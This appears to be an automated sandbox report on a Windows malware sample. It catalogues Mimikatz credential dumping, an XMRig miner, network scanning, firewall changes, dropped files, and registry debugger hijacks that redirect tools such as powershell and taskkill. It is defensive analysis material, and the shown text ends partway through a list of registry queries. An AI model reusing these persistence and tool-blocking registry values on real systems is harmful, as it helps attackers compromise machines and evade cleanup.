Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2024 22:11
Behavioral task
behavioral1
Sample
5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe
Resource
win10v2004-20240802-en
General
-
Target
5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe
-
Size
8.9MB
-
MD5
69c5a4235e3a85ddb511effaccb6c2f5
-
SHA1
eb41d034586d9f2f8e966cd26ce0a6eb0a8f90eb
-
SHA256
5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d
-
SHA512
c2633c93c30de544161f56e12e4f8d8b66c20c29f7bf9c2739ea88b111015918471eb19bd9743beff0c9675265310a768e09869eae074692a38689800b17fc2d
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 880 created 1312 880 euiugba.exe 37 -
Contacts a large (20874) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/8-177-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-181-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-198-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-211-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-220-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-231-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-246-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-250-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-251-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig behavioral2/memory/8-252-0x00007FF6804F0000-0x00007FF680610000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/712-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/712-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000700000002344e-6.dat mimikatz behavioral2/memory/4004-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/2156-137-0x00007FF6DD390000-0x00007FF6DD47E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts euiugba.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe euiugba.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3584 netsh.exe 3168 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 4004 euiugba.exe 880 euiugba.exe 3752 wpcap.exe 2744 glithlcwh.exe 2156 vfshost.exe 2936 wewhpbpmh.exe 3268 xohudmc.exe 3076 tyxtue.exe 8 pctkcm.exe 3588 wewhpbpmh.exe 3484 wewhpbpmh.exe 3528 wewhpbpmh.exe 4172 wewhpbpmh.exe 924 wewhpbpmh.exe 2516 wewhpbpmh.exe 3548 wewhpbpmh.exe 4972 wewhpbpmh.exe 3940 wewhpbpmh.exe 4940 wewhpbpmh.exe 1504 wewhpbpmh.exe 4248 wewhpbpmh.exe 1480 wewhpbpmh.exe 548 wewhpbpmh.exe 3916 wewhpbpmh.exe 5076 wewhpbpmh.exe 2404 euiugba.exe 4876 eguiemhzp.exe -
Loads dropped DLL 12 IoCs
pid Process 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 3752 wpcap.exe 2744 glithlcwh.exe 2744 glithlcwh.exe 2744 glithlcwh.exe -
resource yara_rule behavioral2/files/0x00070000000234a3-134.dat upx behavioral2/memory/2156-135-0x00007FF6DD390000-0x00007FF6DD47E000-memory.dmp upx behavioral2/memory/2156-137-0x00007FF6DD390000-0x00007FF6DD47E000-memory.dmp upx behavioral2/files/0x00070000000234ae-140.dat upx behavioral2/memory/2936-141-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/2936-159-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/files/0x00070000000234ab-163.dat upx behavioral2/memory/8-164-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/3588-170-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/3484-174-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-177-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/3528-179-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-181-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/4172-184-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/924-188-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/2516-192-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/3548-196-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-198-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/4972-201-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/3940-205-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/4940-209-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-211-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/1504-214-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/4248-218-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-220-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/1480-223-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/548-227-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/3916-230-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-231-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/5076-233-0x00007FF68E330000-0x00007FF68E38B000-memory.dmp upx behavioral2/memory/8-246-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/8-250-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/8-251-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx behavioral2/memory/8-252-0x00007FF6804F0000-0x00007FF680610000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 75 ifconfig.me 76 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 euiugba.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 euiugba.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE euiugba.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content euiugba.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE euiugba.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\gezmcuhh\euiugba.exe 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe File opened for modification C:\Windows\gezmcuhh\schoedcl.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\vimpcsvc.xml euiugba.exe File created C:\Windows\gezmcuhh\spoolsrv.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\cnli-1.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\crli-0.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\tucl-1.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\zlib1.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\docmicfg.xml euiugba.exe File created C:\Windows\thgpqiiyn\upbdrjv\swrpwe.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\ssleay32.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\svschost.xml euiugba.exe File created C:\Windows\gezmcuhh\docmicfg.xml euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\exma-1.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\posh-0.dll euiugba.exe File created C:\Windows\gezmcuhh\schoedcl.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\AppCapture64.dll euiugba.exe File created C:\Windows\gezmcuhh\vimpcsvc.xml euiugba.exe File created C:\Windows\thgpqiiyn\Corporate\vfshost.exe euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\Packet.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\ucl.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\spoolsrv.xml euiugba.exe File created C:\Windows\ime\euiugba.exe euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\scan.bat euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\tibe-2.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\trfo-2.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\docmicfg.exe euiugba.exe File created C:\Windows\gezmcuhh\svschost.xml euiugba.exe File opened for modification C:\Windows\thgpqiiyn\zymuetvrm\Result.txt eguiemhzp.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\schoedcl.exe euiugba.exe File created C:\Windows\thgpqiiyn\Corporate\mimidrv.sys euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\eguiemhzp.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\vimpcsvc.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\libxml2.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\trch-1.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\docmicfg.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\svschost.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\Shellcode.ini euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\spoolsrv.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\schoedcl.xml euiugba.exe File created C:\Windows\gezmcuhh\euiugba.exe 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe File opened for modification C:\Windows\thgpqiiyn\zymuetvrm\Packet.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\coli-0.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\AppCapture32.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\xdvl-0.dll euiugba.exe File opened for modification C:\Windows\gezmcuhh\svschost.xml euiugba.exe File opened for modification C:\Windows\gezmcuhh\vimpcsvc.xml euiugba.exe File opened for modification C:\Windows\thgpqiiyn\Corporate\log.txt cmd.exe File created C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\libeay32.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\schoedcl.xml euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\spoolsrv.xml euiugba.exe File opened for modification C:\Windows\gezmcuhh\spoolsrv.xml euiugba.exe File created C:\Windows\thgpqiiyn\Corporate\mimilib.dll euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\wpcap.dll euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\svschost.exe euiugba.exe File created C:\Windows\thgpqiiyn\UnattendGC\specials\vimpcsvc.exe euiugba.exe File opened for modification C:\Windows\gezmcuhh\docmicfg.xml euiugba.exe File created C:\Windows\thgpqiiyn\zymuetvrm\ip.txt euiugba.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 512 sc.exe 4368 sc.exe 2144 sc.exe 2084 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tyxtue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language euiugba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language euiugba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe 